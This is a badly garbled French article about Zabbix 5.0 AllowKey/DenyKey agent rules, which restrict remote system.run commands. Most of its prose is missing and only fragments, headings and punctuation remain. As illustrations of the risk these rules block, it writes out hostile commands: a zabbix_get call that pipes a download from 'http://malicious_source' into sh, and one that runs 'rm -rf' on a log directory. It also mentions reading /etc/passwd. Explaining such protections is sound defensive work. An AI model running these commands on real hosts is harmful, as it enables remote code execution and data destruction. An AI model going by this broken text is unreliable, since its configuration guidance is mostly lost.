Prise en charge des listes noires et blanches pour les métriques côté agent dans Zabbix 5.0



Prise en charge des listes noires et blanches pour les métriques côté agent



Tikhon Uskov , ingénieur d'intégration, Zabbix



Problèmes de sécurité des données



Zabbix 5.0 introduit une nouvelle fonctionnalité qui améliore la sécurité sur les systèmes utilisant Zabbix Agent et remplace l'ancien paramètre EnableRemoteCommands .



, .



  • , , , , .


, zabbix_get , , . .





zabbix_get



. , . , , /etc/passwd/ .



  • . , *system.run[]** , - Zabbix , .


# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]


  • Linux root-, Windows System . , Zabbix Agent , , WMI .


EnableRemoteCommands=0 *system.run[]** -, , , , .





EnableRemoteCommand Zabbix



AllowKey/DenyKey



Zabbix 5.0 .



Zabbix 5.0 , *system.run[]**, , :



AllowKey= — ;



DenyKey= — ;



— , (*).

AllowKey DenyKey . AllowKey/DenyKey . , — , .





, . , , . , .



, , , .





2 vfs.file.size[/tmp/file]



AllowKey/DenyKey:



  1. ,
  2. ,
  3. .


, , , , . , .







2 *system.run[]**, , , , .











— (wildcard). (*) . , . , , wildcard.



[].



  • system.run[* —
  • vfs.file*.txt] —
  • vfs.file.*[*] —


wildcard.



  1. . , , , .
  2. , , .
  3. , wildcard, , . . .




.



  • , . . - , — .






  • , , . , CPU , system.cpu.load[*] , , .










  • , , (discovery) . AllowKey/DenyKey :

    — HostnameItem

    — HostMetadataItem

    — HostInterfaceItem


. - , Zabbix , 'NOTSUPPORTED'. log- . , , - .



  • - (, ).




, .



:



  • Zabbix.
  • zabbix_agentd. Zabbix agent c -print (-p) ( ), , . -test (-t) 'Unsupported item key'.
  • zabbix_get. zabbix_get -k 'ZBX_NOTSUPPORTED: Unknown metric'.




, , zabbix_get, .





**



. .



. , .





, .





. , ? , , , Zabbix?



. regex, , , , . Regex — , . Wildcards — , .



. Include ?



. , , , . AllowKey/DenyKey Include, , .



. Zabbix 5.0 'EnableRemoteCommands=' , AllowKey/DenyKey?



. , .



!




All Articles